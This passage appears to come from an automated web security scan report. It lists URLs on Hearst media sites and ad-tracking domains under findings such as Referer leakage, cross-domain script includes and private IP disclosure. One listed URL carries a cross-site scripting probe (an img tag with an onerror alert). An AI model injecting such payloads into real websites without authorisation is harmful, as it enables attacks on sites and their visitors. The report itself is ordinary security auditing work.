13.125. http://open.ad.yieldmanager.net/a1
13.126. http://optout.33across.com/api/
13.127. http://optout.adlegend.com/nai/optout.php
13.128. http://optout.crwdcntrl.net/optout
13.129. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl
13.130. http://optout.imiclk.com/cgi/optout.cgi
13.131. http://optout.mookie1.decdna.net/optout/nai/
13.132. http://optout.mookie1.decideinteractive.com/optout/nai/
13.133. http://optout.mookie1.dtfssearch.com/optout/nai/
13.134. http://optout.mookie1.pm14.com/optout/nai/
13.135. http://optout.mxptint.net/naioptout.ashx
13.136. http://optout.xgraph.net/optout.gif.jsp
13.137. http://optout.yieldoptimizer.com/optout/ns
13.138. http://p.brilig.com/contact/optout
13.139. http://pbid.pro-market.net/engine
13.140. http://pix04.revsci.net/F09828/a4/0/0/0.js
13.141. http://pix04.revsci.net/F09828/b3/0/3/1008211/677164118.js
13.142. http://pix04.revsci.net/I09837/b3/0/3/0902121/486412827.js
13.143. http://pix04.revsci.net/I09839/b3/0/3/1008211/194305936.js
13.144. http://pixel.fetchback.com/serve/fb/optout
13.145. http://pixel.quantserve.com/optout_set
13.146. http://pixel.quantserve.com/pixel
13.147. http://pixel.rubiconproject.com/tap.php
13.148. http://privacy.revsci.net/optout/optout.aspx
13.149. http://px.owneriq.net/naioptout
13.150. http://r.openx.net/set
13.151. http://r.skimresources.com/api/
13.152. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/9tOMO
13.153. http://rp.gwallet.com/r1/optout
13.154. http://rs.gwallet.com/r1/pixel/x1743
13.155. http://rt.legolas-media.com/lgrt
13.156. http://s.xp1.ru4.com/coop
13.157. http://sensor2.suitesmart.com/sensor4.js
13.158. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/donatemydress_us
13.159. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us
13.160. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf
13.161. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626
13.162. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642
13.163. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61721100
13.164. http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686626
13.165. http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686642
13.166. http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61721100
13.167. http://tag.admeld.com/ad/js/610/hearst/300x250/ht_1064834_61686626
13.168. http://tag.admeld.com/match
13.169. http://tag.admeld.com/nai-status
13.170. http://tag.admeld.com/nai-test-opt-out
13.171. http://tag.admeld.com/pixel
13.172. http://tag.contextweb.com/TagPublish/GetAd.aspx
13.173. http://tag.contextweb.com/TagPublish/getjs.aspx
13.187. http://www.adadvisor.net/nai/optout
13.188. http://www.adbrite.com/mb/nai_optout.php
13.189. http://www.addthis.com/api/nai/optout
13.190. http://www.bizographics.com/nai/optout
13.191. http://www.burstnet.com/cgi-bin/opt_out.cgi
13.192. http://www.burstnet.com/enlightn/8117//3E06/
13.193. http://www.burstnet.com/enlightn/8171//99D2/
13.194. http://www.foxreno.com/2011/0915/29196544_320X240.jpg
13.195. http://www.kaboodle.com/
13.196. http://www.kampyle.com/feedback_form/ff-feedback-form.php
13.198. http://www.mediaplex.com/optout_pure.php
13.199. http://www.mediaplex.com/optout_pure.php
13.200. http://www.nexac.com/nai_optout.php
13.201. http://www.seventeen.com/cm/shared/images/logos/hearst-teen-logo-white.gif
13.202. http://www2.glam.com/app/site/affiliate/nc/g-optout.act
14. Password field with autocomplete enabled
16. Referer-dependent response
16.1. http://a.collective-media.net/optout
16.2. http://adnxs.revsci.net/imp
16.3. http://ads.adbrite.com/adserver/vdi/762701
16.4. http://ads.amgdgt.com/ads/opt-out
16.5. http://ats.tumri.net/ats/optout
16.6. http://c.brightcove.com/services/viewer/federated_f9
16.7. http://hearst.com/images/icon-pointer-roll.gif
16.8. http://hearst.com/images/icon-pointer.gif
16.9. http://optout.collective-media.net/optout/status
16.10. http://pixel.adsafeprotected.com/jspix
16.11. http://www.facebook.com/extern/login_status.php
16.12. http://www.facebook.com/plugins/like.php
16.13. http://www.facebook.com/plugins/likebox.php
16.14. http://www.kaboodle.com/
17.2. http://www.quickandsimple.com/
17.3. http://www.seventeen.com/
17.4. http://www.thedailygreen.com/
18. Cross-domain Referer leakage
18.1. http://a.netmng.com/hic/
18.2. http://a.tribalfusion.com/j.ad
18.3. http://a.tribalfusion.com/j.ad
18.4. http://a.tribalfusion.com/j.ad
18.5. http://a1.interclick.com/CookieCheck.aspx
18.6. http://a1.interclick.com/optOut.aspx
18.7. http://ad.agkn.com/iframe!t=1089!
18.8. http://ad.agkn.com/iframe!t=1089!
18.9. http://ad.amgdgt.com/ads/
18.10. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3
18.11. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3
18.12. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3
18.13. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3
18.14. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3
18.15. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3
18.16. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3
18.17. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3
18.18. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3
18.19. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5
18.20. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5
18.21. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5
18.22. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5
18.23. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5
18.24. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5
18.25. http://ad.doubleclick.net/adi/N1558.NetMining/B4742075.6
18.26. http://ad.doubleclick.net/adi/N5019.284127.DBGVIDEONETWORK/B5621714
18.27. http://ad.doubleclick.net/adi/N6257.274732.SEATTLEPI-NNN/B5824230.2
18.28. http://ad.doubleclick.net/adi/N6257.274732.SEATTLEPI-NNN/B5824230.2
18.29. http://ad.doubleclick.net/adi/N6257.274732.SEATTLEPI-NNN/B5824230.3
18.30. http://ad.doubleclick.net/adi/N6257.274732.SEATTLEPI-NNN/B5824230.3
18.31. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.30
18.32. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.31
18.33. http://ad.doubleclick.net/adj/N5295.SD128132N5295SN0/B5753751.3
18.34. http://ad.doubleclick.net/adj/N5295.SD128132N5295SN0/B5761718.3
18.35. http://ad.doubleclick.net/adj/hdm.seventeen/other/
18.36. http://ad.doubleclick.net/adj/hdm.seventeen/other/
18.37. http://ad.doubleclick.net/adj/hdm.seventeen/other/
18.38. http://ad.doubleclick.net/adj/hfmus.eg.hp/landingpage
18.39. http://ad.doubleclick.net/adj/hfmus.eg.hp/landingpage
18.40. http://ad.doubleclick.net/adj/hfmus.eg.hp/landingpage
18.41. http://ad.doubleclick.net/adj/hfmus.eg.hp/landingpage
18.42. http://ad.doubleclick.net/adj/hfmus.eg.hp/landingpage
18.43. http://ad.doubleclick.net/adj/locm.hp
18.44. http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer/home
18.45. http://ad.doubleclick.net/adj/realage.index/index/other/
18.46. http://ad.doubleclick.net/adj/ugo.ugo.ugohome/ugohome
18.47. http://ad.turn.com/server/ads.js
18.48. http://adsfac.us/ag.asp
18.49. http://adunit.cdn.auditude.com/flash/modules/display/auditudeDisplayLib.js
18.50. http://advertising.aol.com/nai/nai.php
18.51. http://advertising.aol.com/nai/nai.php
18.52. http://advertising.aol.com/nai/nai.php
18.53. http://advertising.aol.com/nai/nai.php
18.54. http://afe.specificclick.net/
18.55. http://afe.specificclick.net/
18.56. http://afe.specificclick.net/
18.57. http://afe.specificclick.net/
18.58. http://afe.specificclick.net/serve/v=5
18.59. http://afe.specificclick.net/serve/v=5
18.60. http://amch.questionmarket.com/adscgen/d_layer.php
18.61. http://as.serving-sys.com/OptOut/nai_optout.aspx
18.62. http://as.serving-sys.com/OptOut/nai_optout_results.aspx
18.63. http://as1.suitesmart.com/102386/G14531.js
18.64. http://choice.atdmt.com/AdvertisementChoice/opt.out
18.65. http://choice.atdmt.com/AdvertisementChoice/opt.out
18.66. http://choice.bing.com/AdvertisementChoice/opt.out
18.67. http://choice.bing.com/AdvertisementChoice/opt.out
18.68. http://choice.live.com/AdvertisementChoice/opt.out
18.69. http://choice.live.com/AdvertisementChoice/opt.out
18.70. http://choice.live.com/AdvertisementChoice/opt.out
18.71. http://choice.live.com/AdvertisementChoice/opt.out
18.72. http://choice.microsoft.com/AdvertisementChoice/opt.out
18.73. http://choice.msn.com/AdvertisementChoice/opt.out
18.74. http://choice.msn.com/AdvertisementChoice/opt.out
18.75. http://choice.msn.com/AdvertisementChoice/opt.out
18.76. http://choices.truste.com/ca
18.77. http://choices.truste.com/ca
18.78. http://cim.meebo.com/cim
18.79. http://cm.g.doubleclick.net/pixel
18.80. http://cm.g.doubleclick.net/pixel
18.81. http://cm.g.doubleclick.net/pixel
18.82. http://cm.g.doubleclick.net/pixel
18.83. http://cm.g.doubleclick.net/pixel
18.84. http://cm.npc-hearst.overture.com/js_1_0/
18.85. http://cm.npc-hearst.overture.com/js_1_0/
18.86. http://cn2.kaboodle.com/ht/scripts/wick.js
18.87. http://contextweb.pixel.invitemedia.com/context_sync
18.88. http://dis.criteo.com/dis/optoutstatus.aspx
18.89. http://dis.criteo.com/dis/optoutstatus.aspx
18.90. http://edge.aperture.displaymarketplace.com/anotnai.gif
18.91. http://edge.aperture.displaymarketplace.com/anotnaistat.gif
18.92. http://fls.doubleclick.net/activityi
18.93. http://googleads.g.doubleclick.net/pagead/ads
18.94. http://googleads.g.doubleclick.net/pagead/ads
18.95. http://googleads.g.doubleclick.net/pagead/ads
18.96. http://img.pulsemgr.com/optout
18.97. http://img.pulsemgr.com/optout
18.98. http://info.yahoo.com/nai/nai-status.html
18.99. http://info.yahoo.com/nai/nai-verify.html
18.100. http://load.exelator.com/load/OptOut.php
18.101. http://loadus.exelator.com/load/
18.102. http://loadus.exelator.com/load/net.php
18.103. http://loadus.exelator.com/load/net.php
18.104. http://media.fastclick.net/nai/remove
18.105. http://media.fastclick.net/nai/verify
18.106. http://oo.afy11.net/NAIIsOptOut.aspx
18.107. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl
18.108. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl
18.109. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl
18.110. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl
18.111. http://optout.ib-ibi.com:8000/VerifyCookieStatus.aspx
18.112. http://optout.ib-ibi.com:8000/VerifyCookieStatus.aspx
18.113. http://optout.mxptint.net/naistatus.ashx
18.114. http://optout.mxptint.net/naistatus.ashx
18.115. http://pbid.pro-market.net/engine
18.116. http://platform.twitter.com/widgets/follow_button.html
18.117. http://rad.msn.com/ADSAdClient31.dll
18.118. http://s.meebocdn.net/cim/script/feeds_v92_cim_11_12_5.en.js
18.119. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf
18.120. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf
18.121. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626
18.122. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626
18.123. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626
18.124. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626
18.125. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642
18.126. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61721100
18.127. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61721100
18.128. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61721100
18.129. http://tag.admeld.com/nai-status
18.130. http://widget.newsinc.com/_fw/common/toppicks_common1.html
18.131. http://www.answerology.com/cobrands/cosmogirl/CosmogirlLayout.js
18.132. http://www.answerology.com/cobrands/cosmopolitan/CosmopolitanLayout.js
18.133. http://www.answerology.com/cobrands/delish/DelishLayout.js
18.134. http://www.answerology.com/cobrands/goodhousekeeping/GoodhousekeepingLayout.js
18.135. http://www.answerology.com/cobrands/marieclaire/MarieClaireLayout.js
18.136. http://www.answerology.com/cobrands/quickandsimple/QuickAndSimpleLayout.js
18.137. http://www.answerology.com/cobrands/realbeauty/RealBeautyLayout.js
18.138. http://www.answerology.com/cobrands/redbookmag/RedbookmagLayout.js
18.139. http://www.answerology.com/cobrands/seventeen/SeventeenLayout.js
18.140. http://www.answerology.com/cssjs/CoachesLayout.js
18.141. http://www.answerology.com/cssjs/Layout.js
18.142. http://www.answerology.com/index.aspx
18.143. http://www.answerology.com/index.aspx
18.144. http://www.answerology.com/index.aspx
18.145. http://www.facebook.com/plugins/activity.php
18.146. http://www.facebook.com/plugins/activity.php
18.147. http://www.facebook.com/plugins/fan.php
18.148. http://www.facebook.com/plugins/fan.php
18.149. http://www.facebook.com/plugins/fan.php
18.150. http://www.facebook.com/plugins/likebox.php
18.151. http://www.facebook.com/plugins/likebox.php
18.152. http://www.facebook.com/plugins/likebox.php
18.153. http://www.facebook.com/plugins/likebox.php
18.154. http://www.facebook.com/plugins/likebox.php
18.155. http://www.facebook.com/plugins/likebox.php
18.156. http://www.facebook.com/plugins/likebox.php
18.157. http://www.facebook.com/plugins/likebox.php
18.158. http://www.facebook.com/plugins/likebox.php
18.159. http://www.facebook.com/plugins/likebox.php
18.160. http://www.facebook.com/plugins/likebox.php
18.161. http://www.facebook.com/plugins/likebox.php
18.162. http://www.facebook.com/plugins/likebox.php
18.163. http://www.kampyle.com/feedback_form/ff-feedback-form.php
18.164. http://www.local.com/dart/
18.165. http://www.local.com/dart/
18.166. http://www.local.com/dart/
18.167. http://www.mathtag.com/cgi-bin/optout
18.168. http://www.mathtag.com/cgi-bin/optout
18.169. http://www.networkadvertising.org/yahoo_handler
18.170. http://www.pulse360.com/behavior/nai-opt-out.html
18.171. http://www.pulse360.com/behavior/nai-opt-out.html
18.172. http://www.seattlepi.com/flashtalking/ftlocal.html
18.173. http://www.tidaltv.com/optout/status.ashx
18.174. http://www.tidaltv.com/optout/verfiyoptout.ashx
18.175. http://www.tribalfusion.com/optout/verify.js
18.176. http://www.ugo.com/cm/ugo/js/ugo-global.js
18.177. http://www.zvents.com/misc/widgets/20645.js
19. Cross-domain script include
19.1. http://a.netmng.com/hic/
19.2. http://a.tribalfusion.com/j.ad
19.3. http://ad.amgdgt.com/ads/
19.4. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3
19.5. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5
19.6. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.30
19.7. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.31
19.8. http://afe.specificclick.net/
19.9. http://afe.specificclick.net/
19.10. http://afe.specificclick.net/
19.11. http://afe.specificclick.net/serve/v=5
19.12. http://afe.specificclick.net/serve/v=5
19.13. http://corporate.local.com/mk/get/advertising-opportunities
19.14. http://corporate.local.com/mk/get/contact-us
19.15. http://ellegirl.elle.com/
19.16. http://googleads.g.doubleclick.net/pagead/ads
19.18. http://hearst.com/about-hearst/corporate-george-r-hearst-jr.php
19.19. http://hearst.com/about-hearst/corporate-mark-e-aldam.php
19.20. http://hearst.com/about-hearst/index.php
19.21. http://hearst.com/newspapers/albany-times-union.php
19.22. http://hearst.com/newspapers/hearst-news-service.php
19.23. http://hearst.com/newspapers/index.php
19.24. http://hearst.com/newspapers/localedge.php
19.25. http://hearst.com/newspapers/metrix4media.php
19.26. http://hearst.com/newspapers/seattlepicom.php
19.27. http://hearst.com/newspapers/the-advocate.php
19.28. http://hearst.com/press-room/index.php
19.29. http://internetmarketing.localedge.com/
19.30. http://internetmarketing.localedge.com/wp-content/themes/images/default.png
19.31. http://js.zvents.com/javascripts/happy_partner_widgets.js
19.33. http://pbid.pro-market.net/engine
19.34. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf
19.35. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf
19.36. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626
19.37. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626
19.38. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626
19.39. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626
19.40. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642
19.41. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61721100
19.42. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61721100
19.43. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61721100
19.44. http://widget.newsinc.com/_fw/common/toppicks_common1.html
19.45. http://www.answerology.com/
19.46. http://www.answerology.com/N
19.47. http://www.answerology.com/index.aspx
19.48. http://www.answerology.com/uploaded-images/801818/40x37_thumb.jpg
19.49. http://www.answerology.com/uploaded-images/807708/40x37_thumb.jpg
19.51. http://www.donatemydress.org/
19.52. http://www.facebook.com/plugins/activity.php
19.53. http://www.facebook.com/plugins/fan.php
19.54. http://www.facebook.com/plugins/likebox.php
19.56. http://www.gather.com/426d8%3Cimg+src=a+onerror=alert(%22XSS%22)%3E31b7c6065d67ada9d
19.57. http://www.gather.com/URI+SYNTAX+EXCEPTION
19.58. http://www.gather.com/a
19.59. http://www.kaboodle.com/
19.60. http://www.kampyle.com/feedback_form/ff-feedback-form.php
19.62. http://www.localedge.com/
19.63. http://www.manilla.com/
19.64. http://www.misquincemag.com/
19.65. http://www.networkadvertising.org/managing/opt_out.asp
19.66. http://www.networkadvertising.org/managing/optout_results.asp
19.67. http://www.quickandsimple.com/
19.68. http://www.seattlepi.com/
19.69. http://www.seattlepi.com/flashtalking/ftlocal.html
19.70. http://www.seventeen.com/
19.71. http://www.stamfordadvocate.com/
19.72. http://www.thedailygreen.com/
19.73. http://www.timesunion.com/
19.75. http://www.ugo.com/cm/ugo/js/ugo-global.js
19.76. http://www.ugo.com/xd_receiver.htm
19.77. http://www.zvents.com/misc/widgets/20645.js
20.1. http://1663.ic-live.com/
20.3. http://advertising.aol.com/
20.4. http://afe.specificclick.net/
20.5. http://amch.questionmarket.com/
20.6. http://bh.contextweb.com/
20.7. http://cache.specificmedia.com/
20.11. http://hfm.checkm8.com/
20.12. http://image2.pubmatic.com/
20.13. http://img.pulsemgr.com/
20.14. http://internetmarketing.localedge.com/
20.15. http://login.dotomi.com/
20.16. http://nai.ad.us-ec.adtechus.com/
20.17. http://nai.adserver.adtechus.com/
20.18. http://nai.adserverec.adtechus.com/
20.19. http://nai.adserverwc.adtechus.com/
20.20. http://nai.adsonar.com/
20.22. http://nai.advertising.com/
20.24. http://nai.glb.adtechus.com/
20.25. http://nai.tacoda.at.atwola.com/
20.26. http://nocookie.w55c.net/
20.27. http://notrack.adviva.net/
20.28. http://notrack.specificclick.net/
20.29. http://notrack.specificmedia.com/
20.30. http://optout.33across.com/
20.31. http://optout.adlegend.com/
20.32. http://optout.mookie1.com/
20.33. http://optout.mookie1.decdna.net/
20.34. http://optout.mookie1.decideinteractive.com/
20.35. http://optout.mookie1.dtfssearch.com/
20.36. http://optout.mookie1.pm14.com/
20.37. http://pixel.fetchback.com/
20.38. http://pixel.rubiconproject.com/
20.40. http://r.skimresources.com/
20.41. http://rt.legolas-media.com/
20.43. http://seattlepi.ux.hearstdigitalnews.com/
20.44. http://sensor2.suitesmart.com/
20.45. http://stamfordadvocate.ux.hearstdigitalnews.com/
20.46. http://system.casalemedia.com/
20.47. http://tacoda.at.atwola.com/
20.48. http://test.ctpost.com/
20.49. http://usucmweb.dotomi.com/
20.50. http://www.addthis.com/
20.51. http://www.casalemedia.com/
20.53. http://www.crosspixel.net/
20.54. http://www.fetchback.com/
20.56. http://www.localedge.com/
20.57. http://www.mathtag.com/
20.58. http://www.seattlepi.com/
20.59. http://www.stamfordadvocate.com/
20.60. http://www.timesunion.com/
20.61. http://www.tribalfusion.com/
21.1. http://ads.adbrite.com/adserver/vdi/762701
21.2. http://ads.adbrite.com/adserver/vdi/762701
21.3. http://advertising.aol.com/finish/0/4/1/
21.4. http://advertising.aol.com/finish/1/4/1/
21.5. http://advertising.aol.com/finish/2/4/1/
21.6. http://advertising.aol.com/finish/3/4/1/
21.7. http://advertising.aol.com/finish/4/4/1/
21.8. http://advertising.aol.com/finish/5/4/1/
21.9. http://advertising.aol.com/finish/6/4/1/
21.10. http://advertising.aol.com/finish/7/4/1/
21.11. http://advertising.aol.com/finish/8/4/1/
21.12. http://advertising.aol.com/token/0/2/1812733584/
21.13. http://advertising.aol.com/token/0/3/295357155/
21.14. http://advertising.aol.com/token/1/1/819977518/
21.15. http://advertising.aol.com/token/1/3/1696897902/
21.16. http://advertising.aol.com/token/2/2/1032347115/
21.17. http://advertising.aol.com/token/2/3/1397978719/
21.18. http://advertising.aol.com/token/3/1/8239370/
21.19. http://advertising.aol.com/token/3/3/1557169105/
21.20. http://advertising.aol.com/token/4/1/1128450710/
21.21. http://advertising.aol.com/token/4/3/708534695/
21.22. http://advertising.aol.com/token/5/2/1348442932/
21.23. http://advertising.aol.com/token/5/3/1649521156/
21.24. http://advertising.aol.com/token/6/1/1581270199/
21.25. http://advertising.aol.com/token/6/3/882857095/
21.26. http://advertising.aol.com/token/7/1/52531776/
21.27. http://advertising.aol.com/token/7/3/1777313403/
21.28. http://advertising.aol.com/token/8/1/585997419/
21.29. http://advertising.aol.com/token/8/3/144927758/
21.30. http://cdn.uproxx.com/wp-content/themes/ur_v3/js/jquery.colorbox.js
21.31. http://cdn1.manilla.com/wp-content/themes/manilla-1.2/css/style.css
21.32. http://corporate.local.com/mk/get/advertising-opportunities
21.33. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/s_code.js
21.34. http://internetmarketing.localedge.com/js/jquery.hoverIntent.minified.js
21.35. http://static.localedge.com/common/js/api/localedge.js
21.36. http://static.localedge.com/common/js/api/localedge.localedgemedia.js
21.37. http://www.gather.com/js/niftycube.js
21.38. http://www.local.com/js/s_code.js
21.39. http://www.misquincemag.com/cm/shared/scripts/jquery.json.js
21.40. http://www.realage.com/
21.41. http://www.seattlepi.com/
21.42. http://www.seattlepi.com/flashtalking/ftlocal.html
21.43. http://www.seventeen.com/cm/shared/scripts/jquery.selectbox.js
21.44. http://www.stamfordadvocate.com/
21.45. http://www.stamfordadvocate.com/js/omniture/s_code.js
21.46. http://www.thedailygreen.com/cm/shared/scripts/jquery.json.js
21.47. http://www.zvents.com/misc/widgets/20645.js
22. Private IP addresses disclosed
22.1. http://external.ak.fbcdn.net/safe_image.php
22.2. http://external.ak.fbcdn.net/safe_image.php
22.3. http://external.ak.fbcdn.net/safe_image.php
22.4. http://external.ak.fbcdn.net/safe_image.php
22.5. http://external.ak.fbcdn.net/safe_image.php
22.6. http://external.ak.fbcdn.net/safe_image.php
22.7. http://external.ak.fbcdn.net/safe_image.php
22.8. http://external.ak.fbcdn.net/safe_image.php
22.9. http://external.ak.fbcdn.net/safe_image.php
22.10. http://external.ak.fbcdn.net/safe_image.php
22.11. http://external.ak.fbcdn.net/safe_image.php
22.12. http://external.ak.fbcdn.net/safe_image.php
22.13. http://external.ak.fbcdn.net/safe_image.php
22.14. http://hfm.checkm8.com/adam/cm8adam_1_call.js
22.15. http://hfm.checkm8.com/adam/cm8adam_1_call.js
22.16. http://hfm.checkm8.com/adam/detect
22.17. http://hfm.checkm8.com/adam/detect
22.18. http://hfm.checkm8.com/adam/detected
22.19. http://hfm.checkm8.com/adam/detected
22.20. http://hfm.checkm8.com/dispatcher_scripts/browserDataDetect.js
22.21. http://hfm.checkm8.com/dispatcher_scripts/browserDataDetect.js
22.22. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif
22.23. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif
22.24. http://static.ak.connect.facebook.com/connect.php/en_US
22.25. http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js
22.26. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/zZEOQP4uOC1.gif
22.27. http://www.answerology.com/
22.28. http://www.answerology.com/N
22.29. http://www.answerology.com/N
22.30. http://www.answerology.com/index.aspx
22.31. http://www.answerology.com/uploaded-images/801818/40x37_thumb.jpg
22.32. http://www.answerology.com/uploaded-images/807708/40x37_thumb.jpg
22.33. http://www.facebook.com/extern/login_status.php
22.34. http://www.facebook.com/extern/login_status.php
22.35. http://www.facebook.com/extern/login_status.php
22.36. http://www.facebook.com/extern/login_status.php
22.37. http://www.facebook.com/extern/login_status.php
22.38. http://www.facebook.com/extern/login_status.php
22.39. http://www.facebook.com/extern/login_status.php
22.40. http://www.facebook.com/extern/login_status.php
22.41. http://www.facebook.com/extern/login_status.php
22.42. http://www.facebook.com/extern/login_status.php
22.43. http://www.facebook.com/extern/login_status.php
22.44. http://www.facebook.com/extern/login_status.php
22.45. http://www.facebook.com/extern/login_status.php
22.46. http://www.facebook.com/extern/login_status.php
22.47. http://www.facebook.com/extern/login_status.php
22.48. http://www.facebook.com/extern/login_status.php
22.49. http://www.facebook.com/extern/login_status.php
22.50. http://www.facebook.com/extern/login_status.php
22.51. http://www.facebook.com/extern/login_status.php
22.52. http://www.facebook.com/extern/login_status.php
22.53. http://www.facebook.com/plugins/activity.php
22.54. http://www.facebook.com/plugins/activity.php
22.55. http://www.facebook.com/plugins/activity.php
22.56. http://www.facebook.com/plugins/activity.php
22.57. http://www.facebook.com/plugins/activity.php
22.58. http://www.facebook.com/plugins/activity.php
22.59. http://www.facebook.com/plugins/activity.php
22.60. http://www.facebook.com/plugins/activity.php
22.61. http://www.facebook.com/plugins/activity.php
22.62. http://www.facebook.com/plugins/activity.php
22.63. http://www.facebook.com/plugins/fan.php
22.64. http://www.facebook.com/plugins/fan.php
22.65. http://www.facebook.com/plugins/fan.php
22.66. http://www.facebook.com/plugins/like.php
22.67. http://www.facebook.com/plugins/like.php
22.68. http://www.facebook.com/plugins/like.php
22.69. http://www.facebook.com/plugins/like.php
22.70. http://www.facebook.com/plugins/like.php
22.71. http://www.facebook.com/plugins/like.php
22.72. http://www.facebook.com/plugins/like.php
22.73. http://www.facebook.com/plugins/like.php
22.74. http://www.facebook.com/plugins/like.php
22.75. http://www.facebook.com/plugins/like.php
22.76. http://www.facebook.com/plugins/like.php
22.77. http://www.facebook.com/plugins/like.php
22.78. http://www.facebook.com/plugins/like.php
22.79. http://www.facebook.com/plugins/like.php
22.80. http://www.facebook.com/plugins/like.php
22.81. http://www.facebook.com/plugins/like.php
22.82. http://www.facebook.com/plugins/like.php
22.83. http://www.facebook.com/plugins/like.php
22.84. http://www.facebook.com/plugins/like.php
22.85. http://www.facebook.com/plugins/like.php
22.86. http://www.facebook.com/plugins/like.php
22.87. http://www.facebook.com/plugins/like.php
22.88. http://www.facebook.com/plugins/like.php
22.89. http://www.facebook.com/plugins/like.php
22.90. http://www.facebook.com/plugins/like.php
22.91. http://www.facebook.com/plugins/like.php
22.92. http://www.facebook.com/plugins/like.php
22.93. http://www.facebook.com/plugins/like.php
22.94. http://www.facebook.com/plugins/like.php
22.95. http://www.facebook.com/plugins/like.php
22.96. http://www.facebook.com/plugins/like.php
22.97. http://www.facebook.com/plugins/like.php
22.98. http://www.facebook.com/plugins/like.php
22.99. http://www.facebook.com/plugins/like.php
22.100. http://www.facebook.com/plugins/like.php
22.101. http://www.facebook.com/plugins/like.php
22.102. http://www.facebook.com/plugins/like.php
22.103. http://www.facebook.com/plugins/like.php
22.104. http://www.facebook.com/plugins/like.php
22.105. http://www.facebook.com/plugins/like.php
22.106. http://www.facebook.com/plugins/like.php
22.107. http://www.facebook.com/plugins/like.php
22.108. http://www.facebook.com/plugins/like.php
22.109. http://www.facebook.com/plugins/like.php
22.110. http://www.facebook.com/plugins/like.php
22.111. http://www.facebook.com/plugins/like.php
22.112. http://www.facebook.com/plugins/like.php
22.113. http://www.facebook.com/plugins/like.php
22.114. http://www.facebook.com/plugins/like.php
22.115. http://www.facebook.com/plugins/like.php
22.116. http://www.facebook.com/plugins/like.php
22.117. http://www.facebook.com/plugins/likebox.php
22.118. http://www.facebook.com/plugins/likebox.php
22.119. http://www.facebook.com/plugins/likebox.php
22.120. http://www.facebook.com/plugins/likebox.php
22.121. http://www.facebook.com/plugins/likebox.php
22.122. http://www.facebook.com/plugins/likebox.php
22.123. http://www.facebook.com/plugins/likebox.php
22.124. http://www.facebook.com/plugins/likebox.php
22.125. http://www.facebook.com/plugins/likebox.php
22.126. http://www.facebook.com/plugins/likebox.php
22.127. http://www.facebook.com/plugins/likebox.php
22.128. http://www.facebook.com/plugins/likebox.php
22.129. http://www.facebook.com/plugins/likebox.php
23. Credit card numbers disclosed
24.1. http://1663.ic-live.com/goat.php
24.2. http://33across.com/api/opt-out.php
24.3. http://a.netmng.com/opt-status.php
24.4. http://a.rad.msn.com/ADSAdClient31.dll
